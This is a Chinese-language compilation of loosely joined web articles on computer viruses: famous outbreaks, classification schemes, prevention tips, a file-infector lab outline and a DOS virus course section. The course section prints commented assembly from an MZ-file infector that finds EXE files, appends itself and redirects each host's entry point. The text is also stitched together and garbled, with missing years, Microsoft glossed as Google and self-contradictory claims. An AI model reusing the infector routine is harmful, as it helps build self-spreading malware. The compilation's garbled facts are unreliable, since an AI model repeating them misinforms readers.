文件型病毒

全球十大病毒no.1 “cih病毒”爆发年限:年6月cih病毒(年)是一位名叫陈盈豪的台湾大学生所编写的，从中国台湾传入大陆地区的。

cih的载体是一个名为“icq中文ch_at模块”的工具，并以热门盗版光盘游戏如“古墓奇兵”或windows95/98为媒介，经互联网各网站互相转载，使其迅速传播。

cih病毒属于文件型病毒，其别称存有win95.cih、spacefiller、win32.cih、pe_cih，它主要病毒感染windows95/98下的可执行文件(pe格式，portable executable format)，目前的版本不病毒感染dos以及win 3.x(ne格式，windows and os/2 windows 3.1 execution file format)下的可执行文件，并且在win nt中违宪。

其发展过程经历了v1.0，v1.1、v1.2、v1.3、v1.4总共5个版本。

损失估计：全球约5亿美元no.2 “梅利莎(melissa)”发动年限:年3月梅利莎(年)是通过微软的outlook电子邮件软件，向用户通讯簿名单中的50位联系人发送邮件来传播自身。

该邮件包含以下这句话：“这就是你请求的文档，不要给别人看”，此外夹带一个word文档附件。

而单击这个文件，就会使病毒感染主机并且重复自我复制。

年3月26日，星期五，w97m/梅利莎荣登了全球各地报纸的头版。

估算数字表明，这个word宏脚本病毒感染了全球15%~20%的商用pc。

病毒传播速度之慢而令英特尔公司(intel)、微软公司(microsoft，以下简称谷歌)、以及其他许多采用outlook软件的公司措手不及，避免侵害，他们被迫停用整个电子邮件系统。

损失估计：全球约3亿——6亿美元no.3 “爱虫(iloveyou)”发动年限:年爱虫(年)是通过outlook电子邮件系统传播，邮件主题为“i love you”，包含附件“love-letter-for-you.txt.vbs”。

什么是电脑病毒如何防止感染电脑病毒（Computer Virus）是指一种可以在计算机系统中自我复制并传播的恶意软件，其主要目的是破坏、修改或者盗取计算机的数据。

电脑病毒的感染方式多种多样，如通过电子邮件、移动存储设备、互联网下载等途径。

本文将介绍电脑病毒的种类和感染方式，并提供一些防止感染的有效方法。

一、电脑病毒的种类电脑病毒可以分为多种类型，主要包括以下几类：1. 文件型病毒（File Virus）：这种病毒会附着在常见的文件格式上，如.exe、.doc、.xls等，并在用户打开这些文件时感染计算机系统。

2. 引导型病毒（Boot Virus）：这种病毒会感染计算机的启动引导记录，使计算机在启动时自动加载病毒，并继续感染其他系统文件。

3. 宏病毒（Macro Virus）：宏病毒通常隐藏在文档的宏代码中，并在用户打开文档时自动执行，从而感染计算机系统。

4. 蠕虫病毒（Worm Virus）：与文件病毒不同，蠕虫病毒可以自我复制并在网络中传播，通过利用网络漏洞和弱口令来感染其他主机。

5. 特洛伊木马病毒（Trojan Horse Virus）：特洛伊木马病毒通常伪装成合法的软件，并在用户安装后暗中执行恶意操作，如窃取个人信息、控制计算机等。

二、电脑病毒的感染方式电脑病毒的感染方式多种多样，以下列举常见的几种方式：1. 电子邮件附件：病毒会隐藏在电子邮件附件中，一旦用户打开附件，病毒将感染计算机系统。

2. 下载软件：用户从非官方或不可信的网站下载软件时，很可能会下载到带有病毒的安装包。

3. 移动存储设备：通过U盘、移动硬盘等存储设备传输的文件可能携带病毒，一旦连接到计算机上，病毒将传播到计算机系统。

4. 网络漏洞：未及时打补丁的操作系统或软件容易受到攻击，病毒就可以通过漏洞感染系统。

三、防止电脑病毒感染的方法为了保护计算机免受电脑病毒的侵害，以下是一些有效的防止感染的方法：1. 安装可靠的杀毒软件：选择知名品牌的杀毒软件，并保持其及时更新，以保证对最新的病毒库进行识别和查杀。

计算机病毒分类 计算机病毒分类是怎么样的呢?你有去探讨过吗?下⾯由店铺给你做出详细的计算机病毒分类介绍!希望对你有帮助! 计算机病毒分类⼀： 按感染对象分为引导型、⽂件型、混合型、宏病毒,⽂件型病毒主要攻击的对象是.COM及、EXE等可执⾏⽂件;按其破坏性分良性病毒、恶性病毒! 按照病毒程序⼊侵系统的途径，可将计算机病毒分为以下四种类型： 操作系统型：这种病毒最常见，危害性也最⼤。

外壳型：这种病毒主要隐藏在合法的主程序周围，且很容易编写，同时也容易检查和删除。

⼊侵型：这种病毒是将病毒程序的⼀部分插⼊到合法的主程序中，破坏原程序。

这种病毒的编写⽐较困难。

源码型：这种病毒是在源程序被编译前，将病毒程序插⼊到⾼级语⾔编写的源程序中，经过编译后，成为可执⾏程序的合法部分。

这种程序的编写难度较⼤，⼀旦插⼊，其破坏性极⼤。

计算机病毒分类⼆： 1、⽹络病毒通过计算机⽹络传播感染⽹络中的可执⾏⽂件 2、⽂件病毒感染计算机中的⽂件(如：COM，EXE，DOC等) 3、引导型病毒感染启动扇区(Boot)和硬盘的系统引导扇区(MBR) 4、还有这三种情况的混合型，例如：多型病毒(⽂件和引导型)感染⽂件和引导扇区两种⽬标，这样的病毒通常都具有复杂的算法，它们使⽤⾮常规的办法侵⼊系统，同时使⽤了加密和变形算法。

计算机病毒分类三： 恶性程序码的类别中，电脑病毒和蠕⾍是较具破坏⼒，因为它们有复制的能⼒，从⽽能够感染远⽅的系统。

电脑病毒⼀般可以分成下列各类： 引导区电脑病毒 ⽂件型电脑病毒 复合型电脑病毒 宏病毒 特洛伊/特洛伊⽊马 蠕⾍ 其他电脑病毒/恶性程序码的种类和制作技巧 引导区电脑病毒 90年代中期，最为流⾏的电脑病毒是引导区病毒，主要通过软盘在16位元磁盘操作系统(DOS)环境下传播。

引导区病毒会感染软盘内的引导区及硬盘，⽽且也能够感染⽤户硬盘内的主引导区(MBR)。

⼀但电脑中毒，每⼀个经受感染电脑读取过的软盘都会受到感染。

常见计算机病毒有哪些病毒可以划分为络病毒，文件病毒，引导型病毒。

络病毒通过计算机络传播感染络中的可执行文件，文件病毒感染计算机中的文件(如：COM，EXE，DOC等)，引导型病毒感染启动扇区(Boot)和硬盘的系统引导扇区(MBR)，还有这三种情况的混合型，以下是小编为大家整理的关于常见计算机病毒的相关知识，希望对大家有所帮助!宏病毒 (Macro Virus):宏病毒是目前最热门的话题, 它主要是利用软件本身所提供的宏能力来设计病毒, 所以凡是具有写宏能力的软件都有宏病毒存在的可能, 如Word, Excel, AmiPro都相继传出宏病毒危害的事件, 在台湾最着名的例子正是Taiwan NO.1 Word宏病毒。

引导型病毒 (Boot Strap Sector Virus):又称开机型病毒，是藏匿和感染软盘或硬盘的第一个扇区，即平常我们所说的引导扇区(Boot Sector)。

引导型病毒籍由引导动作而侵入内存，若你用已经感染的磁盘引导，那么病毒将立即感染到你的硬盘。

因为DOS 的结构设计，使得引导型病毒可以于每次开机时，在操作系统还没有被载入之前就被载入到内存中，这个特性使得病毒可以针对DOS的各类中断(Interrupt)得到完全的控制，并且拥有更大的能力去进行传染与破坏。

引导型病毒又可以分为：a、传统引导型病毒传统引导型病毒大多由软盘传染，进入电脑后再伺机传染其它文件，最有名的例子是米开朗基罗病毒。

b、隐型引导型病毒隐型引导型病毒感染的是硬盘的引导扇区，它伪造引导扇区的内容，使防毒软件以为系统是正常的。

c、目录型引导病毒目录型引导病毒只感染电脑的文件分配表(FAT)，一旦你的文件分配表被破坏后，你的电脑中的文件读写就会不正常，甚至丢失文件。

文件型病毒 (File Infector Virus):文件型病毒通常寄生在可执行档(如 *.COM, *.EXE等)中。

当这些文件被执行时，病毒的程序就跟着被执行。

实验三32位文件型病毒实验目的：（1）了解文件型病毒制造基本原理；（2）了解病毒的感染、破坏机制、进一步认识病毒程序；（3）掌握文件型病毒的特征和内在机制；实验环境：Win2000\Win9X\WinNT\WinXP实验内容：用PE分析器对比分析文件感染病毒后的变化病毒引导说明：文件型病毒，没有引导部分演示病毒传染说明：传染范围：Virus.exe所在目录传染目标：可执行文件(.exe)传染过程：搜索目录内的可执行文件，逐个感染病毒触发说明：触发条件：运行Virus.exe程序或被Virus.exe感染的程序病毒破坏说明：破坏能力：无害型传染时减少磁盘的可用空间，在可执行文件上附加一个节(4K)破坏方式：攻击文件在可执行文件上附加一个节(4K)，修改可执行文件的入口地址破坏范围：Virus.exe所在目录病毒查杀说明：病毒危害等级：低，属于无害型病毒病毒特征类型：Bloodhound.W32.1(Norton AntiVirus检测结果，这是Symantec软件来临时指代新病毒的文件）病毒查杀方法：删除所有被感染的文件实验步骤：1、附书资源目录\Experiment\win32virus,书中的目录包括virus.exe(编译的病毒程序)、软件说明书.doc(请仔细阅读)、源代码详解.doc（对代码部分加入了部分注释）以及pll.asm(程序源代码)，example.rar包中选取的一个常用程序（ebookedit）2、将example.rar解压缩到某个目录如D：\virus,解压完毕后应该在该目录下有Button目录、ebookcode.exe、ebookedit.exe、ebrand-it.exe、keymaker.exe等程序，然后把virus.rar解压后的virus.exe复制到该目录中；3、当防病毒程序如Norton AntiVirus(注：此处的测试应以当前测试机器上安装杀毒软件为准，本示例运行时机器上安装的只有Norton AntiVirus，故以此为参照)自动防护功能打开时，鼠标光标位于病毒程序上时，会看到如下的图例：图解说明：注解0-1表示Norton AntiVirus的自动防护功能打开着；注解0-2就是防病毒软件在用户鼠标置于图例0中注解0-3处的Virus.exe程序上时的报警提示。

计算机病毒的定义是什么计算机病毒指的是一类恶意软件，其主要功能是通过自我复制和传播，感染计算机系统并对其造成损害。

病毒的行为方式多种多样，有些病毒会删除用户的数据文件，有些会改变计算机的系统设置，而另一些则会通过网络传播私人信息等，都是致命的。

因此，计算机病毒是计算机安全领域的常见、关键性问题和威胁。

计算机病毒从本质上来讲就是一段程序代码，与其他程序没有区别。

但是，根据其行为分类，计算机病毒可以被分为以下几类：1.文件型病毒：这类病毒会将自身程序代码藏在普通文件中，如.exe文件等。

当用户运行这些文件时，病毒程序会被激活并开始执行病毒代码。

2.脚本型病毒：脚本型病毒主要依靠脚本语言来执行攻击程序。

这类病毒经常出现在因下载违法内容和打开不明邮件等原因，容易受到脚本型病毒的攻击。

3.宏病毒：宏病毒是一种利用宏命令实现感染和破坏此类文档的病毒类型。

这类病毒最常见于Microsoft Office Word、Excel和PowerPoint等文档程序。

4. Rootkit病毒：Rootkit是一种特殊的恶意软件，它能够控制授权使用者之外的任何用户，这种病毒非常难以发现和清除。

这种病毒往往能够嵌入磁盘驱动程序，并掩盖其自身行为和存在。

5. 网络蠕虫病毒：网络蠕虫是一种可以自己繁殖和传播的程序。

这类病毒破坏性很大，能够危及整个网络连接，而且传播速度很快。

由于病毒的自我复制和传播能力，其传染范围可以非常广泛，这对计算机系统带来了极大的危害。

计算机病毒的行为多种多样，影响用户的方式也千奇百怪，例如，病毒程序可以将数据文件和计算机系统文件损坏或删除，改变系统设置，窃取用户隐私，传播广告、欺诈信息等等。

为了保护计算机系统与用户安全，使用防病毒软件是非常必要的。

防病毒软件可以定时扫描计算机，察觉病毒并清除它们。

除了防病毒软件，用户还需注意以下几点：1. 不要随意下载源不明的软件和文件。

2. 不要打开来自不明的邮件和附件。

几种常见的电脑病毒电脑病毒我们都很熟悉，也知道一些比较有名气的病毒是什么，下面就是小编为大家推荐几种常见的电脑病毒，和电脑中了病毒后的症状，希望大家喜欢!几种常见的电脑病毒如下引导区病毒：这类病毒隐藏在硬盘或软盘的引导区，当计算机从感染了引导区病毒的硬盘或软盘启动，或当计算机从受感染的软盘中读取数据时，引导区病毒就开始发作。

一旦它们将自己拷贝到机器的内存中，马上就会感染其他磁盘的引导区，或通过网络传播到其他计算机上。

文件型病毒：文件型病毒寄生在其他文件中，常常通过对它们的编码加密或使用其他技术来隐藏自己。

文件型病毒劫夺用来启动主程序的可执行命令，用作它自身的运行命令。

同时还经常将控制权还给主程序，伪装计算机系统正常运行。

一旦运行被感染了病毒的程序文件，病毒便被激发，执行大量的操作，并进行自我复制，同时附着在您系统其他可执行文件上伪装自身，并留下标记，以后不再重复感染。

宏病毒：它是一种特殊的文件型病毒，一些软件开发商在产品研发中引入宏语言，并允许这些产品在生成载有宏的数据文件之后出现。

宏的功能十分强大，但是便给宏病毒留下可乘之机! 脚本病毒：脚本病毒依赖一种特殊的脚本语言(如：VBScript、JavaScript等)起作用，同时需要主软件或应用环境能够正确识别和翻译这种脚本语言中嵌套的命令。

脚本病毒在某方面与宏病毒类似，但脚本病毒可以在多个产品环境中进行，还能在其他所有可以识别和翻译它的产品中运行。

脚本语言比宏语言更具有开放终端的趋势，这样使得病毒制造者对感染脚本病毒得机器可以有更多的控制力。

网络蠕虫程序：网络蠕虫程序是一种通过间接方式复制自身非感染型病毒。

有些网络蠕虫拦截E-mail系统向世界各地发送自己的复制品;有些则出现在高速下载站点中同时使用两种方法与其它技术传播自身。

它的传播速度相当惊人，成千上万的病毒感染造成众多邮件服务器先后崩溃，给人们带来难以弥补的损失。

“特洛伊木马”程序：特洛伊木马程序通常是指伪装成合法软件的非感染型病毒，但它不进行自我复制。

简谈计算机病毒在当今数字化的时代，计算机已经成为我们生活和工作中不可或缺的一部分。

然而，伴随着计算机技术的飞速发展，计算机病毒这一“顽疾”也如影随形，给我们带来了诸多困扰和损失。

计算机病毒，简单来说，就是一段能够自我复制、传播，并对计算机系统造成损害的程序代码。

它就像是一个隐藏在数字世界里的“小恶魔”，总是伺机而动，寻找着系统的漏洞和弱点，然后发起攻击。

计算机病毒的种类繁多，常见的有文件型病毒、引导型病毒、宏病毒等。

文件型病毒通常会附着在可执行文件上，当用户运行这些文件时，病毒就会被激活并开始感染其他文件。

引导型病毒则主要隐藏在计算机的启动扇区中，能够在系统启动时抢先获得控制权，从而进行破坏。

宏病毒则是寄生在文档中的宏代码里，一旦打开带有宏病毒的文档，病毒就会自动运行。

这些病毒的传播途径也是五花八门。

网络无疑是病毒传播的“快车道”。

当我们在网上浏览网页、下载文件、收发邮件时，都有可能不小心“中招”。

比如，一些恶意网站会通过脚本代码自动下载病毒到用户的计算机中；一些来历不明的邮件附件可能隐藏着病毒，一旦打开就会引发灾难。

此外，移动存储设备，如 U 盘、移动硬盘等，也是病毒传播的常见媒介。

如果在一台感染了病毒的计算机上使用了未经过消毒的移动存储设备，再将其插入另一台计算机，病毒就很容易被传播过去。

计算机病毒的危害不容小觑。

它可能会破坏计算机系统的文件和数据，导致重要信息丢失。

想象一下，你辛苦撰写的文档、精心拍摄的照片，或者多年积累的客户资料，突然之间化为乌有，那将是多么令人崩溃的事情。

病毒还可能会占用计算机的系统资源，使计算机运行速度变得异常缓慢，甚至死机。

这不仅会影响我们的工作效率，还可能会导致一些实时性要求较高的任务无法按时完成，造成严重的后果。

有些病毒甚至能够窃取用户的个人隐私信息，如账号密码、银行卡信息等，给用户带来巨大的经济损失。

为了应对计算机病毒的威胁，我们需要采取一系列的防范措施。

首先，要安装可靠的杀毒软件和防火墙，并及时更新病毒库。

【计算机⽹络病毒六】DOS病毒之⽂件型病毒四、DOS病毒之⽂件型病毒4.4 ⽂件型病毒基本原理感染MZ⽂件MZ⽂件结构及其加载⽂件结构00-01 e_magic; // ⽂件类型标记：0x4D5A魔术数字02-03 e_cblp; // ⽂件最后页的字节数04-05 e_cp; // ⽂件页数06-07 e_crlc; // 重定义项个数08-09 e_cparhdr; // 头部尺⼨，以16B的段落为单位0a-0b e_minalloc; // 所需的最⼩内存段0c-0d e_maxalloc; // 所需的最⼤内存段0e-0f e_ss; // 初始的SS值（相对偏移量）10-11 e_sp; // 初始的SP值12-13 e_csum; // 校验和14-15 e_ip; // 初始的IP值16-17 e_cs; // 初始的CS值（相对偏移量）18-19 e_lfarlc; // 重定位表偏移地址1a-1b e_ovno; // 覆盖号重定位表载⼊模块....加载申请内存后，把载⼊模块读⼊内存指定区域DS、ES指向程度段前缀PSPCS、IP、SS、SP由⽂件头的格式化区域确定并通过重定位进⾏调整EXE⽂件加载之后，从CS：IP开始执⾏。

病毒⼀般将⾃⼰加在⽂件的末端，并修改CS、IP的值指向病毒起始地址，修改⽂件长度和SS、SP MZ⽂件病毒样例分析设置DTAmov ah, 1ahmov dx, offset own_dta-Virus_Startadd dx, siint 21查找EXE⽂件mov ah, 4ehmov dx, offset file_match-Virus_Startadd dx, siint 21jnc count2打开感染⽂件mov ah, 3d02hmov dx, Own_dta-Virus_Start+1eh//⽂件名add dx, siint 21jnc count1读感染⽂件头mov ah, 3fhmov cx, 1chmov dx, offset Exe_Header-Virus_Startadd dx, siint 21jnc count1判读是否感染cmp byte ptr ds:[si+Exe_Header-Virus_Start], ‘M’jnz no_execmp word ptr ds:[si+Exe_Header-Virus_Start+12], ‘FB’jz infected移动⽂件指针⾄⽂件尾mov ax, 4202hxor cx, cxxor dx, dxint 21push dx //宿主程序尾，也是病毒体的开始push ax //将以此为感染后EXE⽂件的⼊⼝写病毒体⾄⽂件尾mov ax, 40hmov cx, Virus_Length //病毒体长度mov dx, si //病毒开始位置int 21获取感染后新⽂件的长度mov ax, 4202hxor cx, cxxor dx, dxint 21mov cx, 200//512 ⼀页div cxinc ax改写感染后⽂件头中⽂件长度信息mov word ptr ds:[si+Exe_Header-Virus_Start+2], dx//⽂件最后⼀页的字节数mov word ptr ds:[si+Exe_Header-Virus_Start+4], ax//⽂件总页数修改感染⽂件⼊⼝⾄病毒代码处pop axpop dxmov cx, 10div cxsub ax, word ptr ds:[si+Exe_Header-Virus_Start+8]//⽂件头⼤⼩mov word ptr ds:[si+Exe_Header-Virus_Start+16], ax//CSmov word ptr ds:[si+Exe_Header-Virus_Start+14], dx//IP写修改后的⽂件头⾄感染⽂件mov ax, 4200hxor cx, cxxor dx, dxint 21mov ah, 40mov cx, 1chmov dx, offset Exe_header-Virus_Startadd dx, siint 21病毒发作pop dx //指向PSP的DSadd dx, offset sz_message-Virus_Startmov ah, 09hint 21返回宿主程序⼊⼝mov ax, esadd ax, 10add ax, cs:[si+Exe_header-Virus_Start+16]push ax //宿主CSpush cs:[si+Exe_header-Virus_Start+14]//宿主IPpush ds....pop dsretf4.5 混合型病毒的基本原理概念混合型病毒也称多型病毒，是结合了引导型和⽂件型两种病毒⽽互为感染的病毒，有感染⽂件和引导扇区两种⽬标混合型病毒既能感染引导区，⼜能感染⽂件，但并⾮将⽂件型病毒和引导型病毒简单地加在⼀起。

virus名词解释
病毒 (Virus) 是一种感染计算机系统和文件的恶意软件，通常采用加密、篡改、破坏等方式来破坏计算机系统的正常运行。

病毒可以通过电子邮件、聊天软件、文件共享等途径进行传播，通常会伪装成附件、链接、图片等形式，诱骗用户点击运行。

病毒的不同类型和特点:
1. 文件型病毒：最常见的病毒类型之一，可以感染计算机系统中的文件，例如.exe、.docx、.pdf 等。

文件型病毒通常会修改文件的内部结构，使得文件无法正常运行，并通过复制和传播等方式进行扩散。

2. 网络型病毒：网络型病毒可以感染计算机网络中的文件和数据，并通过计算机网络进行传播。

网络型病毒通常会在网络中扩散，攻击目标不明确，危害性较大。

3. 宏病毒：宏病毒是一种利用应用程序宏语言编制的计算机病毒，附着在某个文件上，当用户打开这个文件时，宏病毒就被激活，并产生连锁性的感染。

宏病毒通常会修改文档的格式和内容，给用户带来较大的损失。

4. 恶意软件：恶意软件通常也是一种计算机病毒，但与文件型病毒和网络型病毒不同的是，恶意软件通常是为了获取用户的敏感信息、破坏计算机系统、进行网络攻击等目的而设计的。

恶意软件可以通过各种途径进行传播，例如通过电子邮件、聊天软件、文件共享等。

为了防止病毒的攻击，用户应该保持良好的上网习惯，不要随意点击不明来源的邮件和文件，安装杀毒软件等安全工具，定期备份重要数据等。

同时，政府和企业也应该加强网络安全监管和防护措施，防止网络攻击和数据泄露等事件的
发生。

常见的计算机病毒危害大家知道计算机的病毒对我们电脑的危害很大，那最常见的计算机病毒危害具体都有哪些呢?下面是店铺为大家整理的资料，希望对大家有所帮助!1、磁碟机的症状：此病毒会化为碎片,迅速的繁殖,堵塞磁盘使进入不了磁盘,使其电脑崩溃,蓝屏,自动关机,开机文件删除.2、威金的症状：1.中毒后所有.exe执行文件均发生异常;中毒后系统分区生成很多垃圾文件;2、中毒后网络共享打印机生成“远程下层文档”异常队列;3、中毒后网络共享打印机自动打印内容为一行日期的空白页面;4、在所有文件夹下生成纯文件_desktop.ini,内容为一行日期;5、生成病毒文件机器狗的症状：可以穿透系统还原的保护,中毒后一旦连接网络后就会不停的下载病毒及木马,并且四处传播,直至电脑崩溃.3.宏病毒：它利用微软的办公软件中宏的功能而威胁、破坏计算机资源。

计算机的分类：计算机病毒可按良性和恶性分：良性病毒是指只表现自己而不进行破坏的病毒。

恶性病毒是指其目的在于人为的破坏计算机的数据、文档或删除硬盘上保存的全部文件。

计算机病毒可以按系统型分和文件型分：系统型病毒是指驻留在操作系统中，开机后即进入内存而威胁计算机系统安全的病毒，破坏性较大。

文件型病毒是指驻留在文件中，在运行和使用该文件时病毒按条件而发作。

破坏计算机的工作。

计算机病毒按按破坏性分⑴ 良性病毒⑵ 恶性病毒⑶ 极恶性病毒⑷ 灾难性病毒计算机病毒按传染方式分：⑴ 引导区型病毒引导区型病毒主要通过软盘在操作系统中传播，感染引导区，蔓延到硬盘，并能感染到硬盘中的"主引导记录"。

⑵ 文件型病毒文件型病毒是文件感染者，也称为寄生病毒。

它运行在计算机存储器中，通常感染扩展名为COM、EXE、SYS等类型的文件。

⑶ 混合型病毒混合型病毒具有引导区型病毒和文件型病毒两者的特点。

⑷ 宏病毒宏病毒是指用BASIC语言编写的病毒程序寄存在Office 文档上的宏代码。

宏病毒影响对文档的各种操作。

计算机病毒寄生方式和感染途径分类计算机病毒按其寄生方式大致可分为两类:一是引导型病毒,二是文件型病毒。

按其感染途径又可分为驻留内存型和不驻留内存型,驻留内存型按其驻留方式又可细分。

混合型病毒集引导型和文件型病毒特性于一体。

(1)引导型病毒引导型病毒也称磁盘引导型、引导扇区型、磁盘启动型、系统型毒等。

引导型病毒就是把自己的病毒程序放在软盘的引导区以及硬盘的主引导记录区或引导扇区,当作正常的引导程序,而将真正的引导程序搬到其他位置。

这样,计算机启动时,就会把引导区的病毒程序当作正常的引导程序来运行,使寄生在磁盘引导区的静态病毒进入计算机系统,病毒变成活跃状态(或称病毒被激活),这时病毒可以随时进行感染和破坏。

此外,这种病毒通常会改写硬盘上的主引导记录区、引导区、文件分配表、文件目录区、中断向量表等。

引导型病毒几乎清一色都会常驻内存,或称作内存驻留型,差别仅仅在于内存中的位置不同。

引导型病毒按其寄生对象的不同又可分为两类:主引导区病毒和引导区病毒。

引导型病毒的感染目标都是一样的,即磁盘的引导区,所以一般比较好防治。

(2)文件型病毒文件型病毒是指所有通过操作系统的文件系统进行感染的病毒。

文件型病毒以感染可执行文件(.BAT、.EXE、.COM、.SYS、.DLL、.OVL、.VXD 等)的病毒为主,还有一些病毒可以感染高级语言程序的源代码、开发库或编译过程中所生成的中间文件。

病毒可能隐藏在普通的数据文件中,但是这些隐藏在数据文件中的病毒不是独立存在的,必须通过隐藏在可执行文件中的病毒部分来加载这些代码。

宏病毒在某种意义上可以被看作文件型病毒,但由于其数量多、影响大,而且也有自己的特点,所以通常单独分类。

文件型病毒通常分为源码型病毒、入侵型病毒和外壳型病毒,以文件外壳型病毒最为流行。

文件型病毒按其驻留内存方式的不同可分为高端驻留型、常规驻留型、内存控制链驻留型、设备程序补丁驻留型和不驻留内存型。

(3)混合型病毒混合型病毒,也称综合型、复合型病毒,既具有操作系统型病毒的特点,又具有文件型病毒的特点,即这种病毒既可以感染磁盘引导扇区,又可以感染可执行文件,这类病毒的危害性更大。

计算机病毒的种类及防治计算机病毒分类根据多年对计算机病毒的研究，按照科学的、系统的、严密的方法.下面是店铺收集整理的计算机病毒的种类及防治，希望对大家有帮助~~计算机病毒的种类一、按照计算机病毒存在的媒体进行分类根据病毒存在的媒体，病毒可以划分为网络病毒，文件病毒，引导型病毒。

网络病毒通过计算机网络传播感染网络中的可执行文件，文件病毒感染计算机中的文件(如：COM，EXE，DOC等)，引导型病毒感染启动扇区(Boot)和硬盘的系统引导扇区(MBR)，还有这三种情况的混合型，例如：多型病毒(文件和引导型)感染文件和引导扇区两种目标，这样的病毒通常都具有复杂的算法，它们使用非常规的办法侵入系统，同时使用了加密和变形算法。

二、按照计算机病毒传染的方法进行分类根据病毒传染的方法可分为驻留型病毒和非驻留型病毒，驻留型病毒感染计算机后，把自身的内存驻留部分放在内存(RAM)中，这一部分程序挂接系统调用并合并到操作系统中去,他处于激活状态,一直到关机或重新启动.非驻留型病毒在得到机会激活时并不感染计算机内存,一些病毒在内存中留有小部分,但是并不通过这一部分进行传染,这类病毒也被划分为非驻留型病毒。

三、按照计算机病毒破坏的能力进行分类根据病毒破坏的能力可划分为以下几种：无害型除了传染时减少磁盘的可用空间外，对系统没有其它影响。

无危险型这类病毒仅仅是减少内存、显示图像、发出声音及同类音响。

危险型这类病毒在计算机系统操作中造成严重的错误。

非常危险型这类病毒删除程序、破坏数据、清除系统内存区和操作系统中重要的信息。

这些病毒对系统造成的危害，并不是本身的算法中存在危险的调用，而是当它们传染时会引起无法预料的和灾难性的破坏。

由病毒引起其它的程序产生的错误也会破坏文件和扇区，这些病毒也按照他们引起的破坏能力划分。

一些现在的无害型病毒也可能会对新版的DOS、Windows和其它操作系统造成破坏。

例如：在早期的病毒中，有一个“Denzuk”病毒在360K磁盘上很好的工作，不会造成任何破坏，但是在后来的高密度软盘上却能引起大量的数据丢失。

电脑病毒危害大全介绍电脑病毒危害介绍：其危害有一：一、蠕虫病毒。

通常利用系统漏洞或电子邮件传播。

病毒发作时，在本地开辟后门，监听TCP 5554端口，作为服务器等待远程控制命令，黑客可以通过这个端口偷窃用户机器的文件和其他信息。

二、文件型病毒：如CIH 病毒。

发作时硬盘数据、硬盘主引导记录、系统引导扇区、文件分配表被覆盖，造成硬盘数据特别是C盘数据丢失，并破坏部分类型的主板上的FLASH BIOS导致计算机无法使用，是一种既破坏软件又破坏硬件的恶性病毒。

三、宏病毒：它通常寄存在文档或模板中。

它破坏系统的指令很容易被执行，会删除机器中的硬盘中的文件，受破坏的用户的损失将不可估量。

四、木马病毒。

它会在电脑上安装后门程序，你的计算机上的所有文件、程序，以及你使用到的所有帐号、密码都会被它的操纵者窃走。

五、引导型病毒。

它一盘在发作时干扰正常的工作。

其危害有二：1、攻击硬盘主引导扇区、Boot扇区、FAT表、文件目录，使磁盘上的信息丢失。

2、删除软盘、硬盘或网络上的可执行文件或数据文件，使文件丢失。

3、占用磁盘空间。

4、修改或破坏文件中的数据，使内容发生变化。

5、抢占系统资源，使内存减少。

6、占用CPU运行时间，使运行效率降低。

7、对整个磁盘或扇区进行格式化。

8、破坏计算机主板上BIOS内容，使计算机无法工作。

9、破坏屏幕正常显示，干扰用户的操作。

10、破坏键盘输入程序，使用户的正常输入出现错误。

11、攻击喇叭，会使计算机的喇叭发出响声。

有的病毒作者让病毒演奏旋律优美的世界名曲，在高雅的曲调中去杀戮人们的信息财富。

有的病毒作者通过喇叭发出种种声音。

12.干扰打印机，假报警、间断性打印、更换字符感谢您的阅读，祝您生活愉快。

什么是计算机病毒（二）引言概述:计算机病毒是当今数字时代的主要威胁之一。

在本文中，我们将继续探讨计算机病毒的定义、类型和工作原理，以及其对计算机和网络安全产生的影响。

通过深入了解计算机病毒的功能和特性，我们将能够更好地保护自己的设备和信息免受这些恶意软件的侵害。

正文:一、计算机病毒的类型1. 文件型病毒：文件型病毒是通过感染文件来传播和扩散的。

它们会将恶意代码嵌入到常见的文件格式中，如.doc、.exe和.jpg 等，一旦被打开或执行，病毒便会激活并开始传播。

2. 引导型病毒：引导型病毒的主要目标是计算机的启动扇区和主引导记录。

一旦被感染，引导型病毒在计算机启动时会先加载自身，并在进入操作系统之前继续感染其他文件和扇区。

3. 宏病毒：宏病毒主要存在于微软办公软件（如Word、Excel）中。

它们利用宏语言功能执行恶意代码，并通过感染文档或模板来传播。

4. 网络蠕虫：网络蠕虫是一种能够自我复制和传播的病毒。

利用网络连接，它们能够在多台计算机之间传播，并对目标系统进行攻击和感染。

5. 木马病毒：木马病毒隐藏在合法程序或文件中，当用户执行这些文件时，木马病毒便会启动，并在用户不知情的情况下获取系统信息和掌控计算机。

二、计算机病毒的工作原理1. 感染：计算机病毒通过利用操作系统或应用程序的漏洞，将恶意代码注入到计算机或文件中。

2. 扩散：一旦感染成功，病毒会自我复制并寻找其他文件、扇区或系统进行传播，从而扩大感染范围。

3. 激活：病毒在特定条件下被激活，这通常是由时间、日期、事件触发等因素所决定。

4. 破坏：病毒会对计算机系统和数据造成损害，例如删除文件、损坏硬盘、篡改数据等。

5. 控制：某些病毒可以打开后门或远程控制功能，让攻击者远程操作被感染的计算机。

三、计算机病毒的影响1. 数据损坏：病毒可以删除、篡改或损坏计算机上的数据，从而对个人和组织的重要信息造成损失。

2. 系统崩溃：某些病毒可能导致系统崩溃或性能下降，使计算机无法正常工作。